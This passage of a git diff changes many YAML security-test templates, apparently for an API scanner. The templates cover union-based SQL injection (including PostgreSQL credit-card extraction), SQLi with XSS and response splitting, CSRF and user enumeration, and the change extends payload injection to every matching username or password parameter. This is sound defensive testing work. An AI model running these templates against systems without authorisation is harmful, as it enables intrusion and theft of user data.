gte: 200 @@ -198,7 +200,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedPostgreSQLiCreditCardDetailsExtractionPayload.yml b/Broken-User-Authentication/UnionBasedPostgreSQLiCreditCardDetailsExtractionPayload.yml index 45b49c021..171ef84b7 100644 --- a/Broken-User-Authentication/UnionBasedPostgreSQLiCreditCardDetailsExtractionPayload.yml +++ b/Broken-User-Authentication/UnionBasedPostgreSQLiCreditCardDetailsExtractionPayload.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -109,7 +109,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -161,7 +162,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -214,7 +216,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionGET.yml b/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionGET.yml index 2c48749b4..414aa3c99 100644 --- a/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionGET.yml +++ b/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -101,7 +101,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -153,7 +154,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -206,7 +208,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionPOST.yml b/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionPOST.yml index 833e3d271..de6697590 100644 --- a/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionPOST.yml +++ b/Broken-User-Authentication/UnionBasedPostgresSQLiCreditCardDetailsExtractionPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -101,7 +101,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -153,7 +154,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -206,7 +208,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedSQLiXSS.yml b/Broken-User-Authentication/UnionBasedSQLiXSS.yml index d462a4c7f..971d3dbf2 100644 --- a/Broken-User-Authentication/UnionBasedSQLiXSS.yml +++ b/Broken-User-Authentication/UnionBasedSQLiXSS.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -107,7 +107,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionXSSPayloads} + ${userKey}: ${userVal}${unionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -153,7 +154,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -200,7 +202,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedSQLiXSSGET.yml b/Broken-User-Authentication/UnionBasedSQLiXSSGET.yml index 50f55e7c0..d11c590ea 100644 --- a/Broken-User-Authentication/UnionBasedSQLiXSSGET.yml +++ b/Broken-User-Authentication/UnionBasedSQLiXSSGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -99,7 +99,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionXSSPayloads} + ${userKey}: ${userVal}${unionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -145,7 +146,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -192,7 +194,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedSQLiXSSPOST.yml b/Broken-User-Authentication/UnionBasedSQLiXSSPOST.yml index 988fabf92..575744534 100644 --- a/Broken-User-Authentication/UnionBasedSQLiXSSPOST.yml +++ b/Broken-User-Authentication/UnionBasedSQLiXSSPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -99,7 +99,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionXSSPayloads} + ${userKey}: ${userVal}${unionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -145,7 +146,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -192,7 +194,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionXSSNegativePayloads} + ${userKey}: ${unionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionBasedSQLiwithXSSandHTTPResponseSplitting.yml b/Broken-User-Authentication/UnionBasedSQLiwithXSSandHTTPResponseSplitting.yml index 24bee708e..6f681aa03 100644 --- a/Broken-User-Authentication/UnionBasedSQLiwithXSSandHTTPResponseSplitting.yml +++ b/Broken-User-Authentication/UnionBasedSQLiwithXSSandHTTPResponseSplitting.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -91,7 +91,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${advUnionXSSPayloads} + ${userKey}: ${userVal}${advUnionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -138,7 +139,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${advUnionXSSNegativePayloads} + ${userKey}: ${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -185,7 +187,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${advUnionXSSNegativePayloads} + ${userKey}: ${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiGET.yml b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiGET.yml index 9c48ee1dd..b637721f1 100644 --- a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiGET.yml +++ b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiOnLoginEndpoint.yml b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiOnLoginEndpoint.yml index f68521d80..c0cdf8141 100644 --- a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiOnLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiOnLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -158,7 +159,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -205,7 +207,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiPOST.yml b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiPOST.yml index ab5b3a60a..ab0730358 100644 --- a/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiPOST.yml +++ b/Broken-User-Authentication/UnionCaseChangeBasedMySQLDBSQLiPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${unionBasedNegativePayloads} + ${userKey}: ${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionColumnBasedSQLiGET.yml b/Broken-User-Authentication/UnionColumnBasedSQLiGET.yml index 6d09c8146..41bc48c21 100644 --- a/Broken-User-Authentication/UnionColumnBasedSQLiGET.yml +++ b/Broken-User-Authentication/UnionColumnBasedSQLiGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -110,7 +110,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -158,7 +159,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -207,7 +209,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionColumnBasedSQLiLoginEndpoint.yml b/Broken-User-Authentication/UnionColumnBasedSQLiLoginEndpoint.yml index 1e06aa58f..b026d5106 100644 --- a/Broken-User-Authentication/UnionColumnBasedSQLiLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionColumnBasedSQLiLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -118,7 +118,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -163,7 +164,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -209,7 +211,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionColumnBasedSQLiPOST.yml b/Broken-User-Authentication/UnionColumnBasedSQLiPOST.yml index 245dfae06..b0999a843 100644 --- a/Broken-User-Authentication/UnionColumnBasedSQLiPOST.yml +++ b/Broken-User-Authentication/UnionColumnBasedSQLiPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -110,7 +110,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -155,7 +156,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -201,7 +203,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionDataTypeBasedSQLiLoginEndpoint.yml b/Broken-User-Authentication/UnionDataTypeBasedSQLiLoginEndpoint.yml index f7c4dd454..b1e9b1fa7 100644 --- a/Broken-User-Authentication/UnionDataTypeBasedSQLiLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionDataTypeBasedSQLiLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -119,7 +119,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -164,7 +165,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -210,7 +212,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionDataTypeBasedSQLiPOST.yml b/Broken-User-Authentication/UnionDataTypeBasedSQLiPOST.yml index 75ca68df3..bedc97300 100644 --- a/Broken-User-Authentication/UnionDataTypeBasedSQLiPOST.yml +++ b/Broken-User-Authentication/UnionDataTypeBasedSQLiPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -156,7 +157,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -202,7 +204,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionInlineCommentBasedMySQLiGET.yml b/Broken-User-Authentication/UnionInlineCommentBasedMySQLiGET.yml index e14d2c30e..bf63770f8 100644 --- a/Broken-User-Authentication/UnionInlineCommentBasedMySQLiGET.yml +++ b/Broken-User-Authentication/UnionInlineCommentBasedMySQLiGET.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionInlineCommentBasedMySQLiPOST.yml b/Broken-User-Authentication/UnionInlineCommentBasedMySQLiPOST.yml index 0cf6980aa..cd729a07e 100644 --- a/Broken-User-Authentication/UnionInlineCommentBasedMySQLiPOST.yml +++ b/Broken-User-Authentication/UnionInlineCommentBasedMySQLiPOST.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -103,7 +103,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -197,7 +199,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UnionInlineCommentBasedMySQLionLoginEndpoint.yml b/Broken-User-Authentication/UnionInlineCommentBasedMySQLionLoginEndpoint.yml index d6e09d1ef..3727a380e 100644 --- a/Broken-User-Authentication/UnionInlineCommentBasedMySQLionLoginEndpoint.yml +++ b/Broken-User-Authentication/UnionInlineCommentBasedMySQLionLoginEndpoint.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -157,7 +158,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -205,7 +207,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionBasedNegativePayloads} + ${userKey}: ${userVal}${unionBasedNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/UserAgentCSRF.yml b/Broken-User-Authentication/UserAgentCSRF.yml index 86ce008df..a4130be53 100644 --- a/Broken-User-Authentication/UserAgentCSRF.yml +++ b/Broken-User-Authentication/UserAgentCSRF.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: contains_either: csrf - extract: csrf_key + extractMultiple: csrf_key value: not_contains: - ":" diff --git a/Broken-User-Authentication/UserEnumerationAccountLock.yml b/Broken-User-Authentication/UserEnumerationAccountLock.yml index 99f4515c3..cc039186b 100644 --- a/Broken-User-Authentication/UserEnumerationAccountLock.yml +++ b/Broken-User-Authentication/UserEnumerationAccountLock.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" execute: @@ -83,7 +83,8 @@ execute: requests: - req: - modify_body_param: - userKey: dummyUser@dummy.com + ${userKey}: dummyUser@dummy.com + for_each_combination: true - validate: response_code: gte: 400 @@ -100,7 +101,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummyUser@dummy.com + ${userKey}: dummyUser@dummy.com + for_each_combination: true - modify_header: ${roles_access_context.LOCKED_ACCOUNT_SYSTEM_ROLE}: 1 - validate: diff --git a/Broken-User-Authentication/UserEnumerationPasswordReset.yml b/Broken-User-Authentication/UserEnumerationPasswordReset.yml index e4090a02b..006f8f4ea 100644 --- a/Broken-User-Authentication/UserEnumerationPasswordReset.yml +++ b/Broken-User-Authentication/UserEnumerationPasswordReset.yml @@ -87,20 +87,21 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|passwd|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$|^code$|^token$" - extract: passKey + extractMultiple: passKey execute: type: multiple requests: - req: - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: response_code: gte: 400 @@ -117,9 +118,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: or: - response_code: @@ -136,9 +139,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default2! + ${passKey}: Default2! + for_each_combination: true - validate: or: - response_payload: diff --git a/Broken-User-Authentication/UserEnumerationRegistrationProcess.yml b/Broken-User-Authentication/UserEnumerationRegistrationProcess.yml index 81533fe65..ce16ae5ae 100644 --- a/Broken-User-Authentication/UserEnumerationRegistrationProcess.yml +++ b/Broken-User-Authentication/UserEnumerationRegistrationProcess.yml @@ -83,20 +83,21 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: "password|^pass$|^pwd$|^user_password$|^userpass$|passwd|^user_pwd$|^password1$|^userPass$|^login_password$|^loginpassword$|^user_pass$|^access_password$|^secret$|^user_secret$|^code$|^token$" - extract: passKey + extractMultiple: passKey execute: type: multiple requests: - req: - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: response_code: gte: 400 @@ -113,9 +114,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default1! + ${passKey}: Default1! + for_each_combination: true - validate: or: - response_payload: @@ -133,9 +136,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: dummymail@dummy.com + ${userKey}: dummymail@dummy.com + for_each_combination: true - modify_body_param: - passKey: Default2! + ${passKey}: Default2! + for_each_combination: true - validate: or: - response_payload: diff --git a/Broken-User-Authentication/UserEnumerationResponseTime.yml b/Broken-User-Authentication/UserEnumerationResponseTime.yml index 9a1197a1f..4d64ba25b 100644 --- a/Broken-User-Authentication/UserEnumerationResponseTime.yml +++ b/Broken-User-Authentication/UserEnumerationResponseTime.yml @@ -83,14 +83,14 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|client_id|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: regex: "^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}$" - request_payload: for_one: key: regex: 